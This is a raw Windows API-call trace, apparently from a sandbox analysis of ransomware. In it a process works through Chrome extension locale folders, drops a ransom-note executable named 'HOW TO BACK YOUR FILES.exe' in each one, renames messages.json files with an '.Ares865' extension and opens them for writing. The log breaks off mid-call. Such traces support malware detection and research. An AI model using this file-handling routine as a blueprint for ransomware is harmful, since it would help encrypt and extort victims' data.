CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.002] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.002] GetLastError () returned 0x0 [0102.002] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.002] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.003] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.003] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.003] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.003] lstrlenW (lpString="messages.json") returned 13 [0102.003] lstrlenW (lpString="Ares865") returned 7 [0102.003] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.Ares865") returned 160 [0102.003] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=204) returned 1 [0102.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US" [0102.008] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US" [0102.008] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.008] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.008] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.009] GetLastError () returned 0x0 [0102.009] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.009] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.009] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.009] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.009] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.009] lstrlenW (lpString="messages.json") returned 13 [0102.009] lstrlenW (lpString="Ares865") returned 7 [0102.009] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.Ares865") returned 163 [0102.010] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.011] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=265) returned 1 [0102.015] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB" [0102.015] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB" [0102.015] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.015] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.015] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.016] GetLastError () returned 0x0 [0102.016] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.016] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.016] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.016] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.016] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.016] lstrlenW (lpString="messages.json") returned 13 [0102.016] lstrlenW (lpString="Ares865") returned 7 [0102.016] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.Ares865") returned 163 [0102.016] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.018] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=178) returned 1 [0102.021] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el" [0102.021] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el" [0102.021] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.021] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.022] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.022] GetLastError () returned 0x0 [0102.022] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.022] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.022] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.022] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.023] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.023] lstrlenW (lpString="messages.json") returned 13 [0102.023] lstrlenW (lpString="Ares865") returned 7 [0102.023] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.023] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.Ares865") returned 160 [0102.023] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\el\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.024] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=298) returned 1 [0102.027] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de" [0102.027] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de" [0102.027] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.027] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.028] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.028] GetLastError () returned 0x0 [0102.028] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.028] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.028] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.028] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.029] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.029] lstrlenW (lpString="messages.json") returned 13 [0102.029] lstrlenW (lpString="Ares865") returned 7 [0102.029] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.029] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.Ares865") returned 160 [0102.029] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\de\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=193) returned 1 [0102.036] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\da") 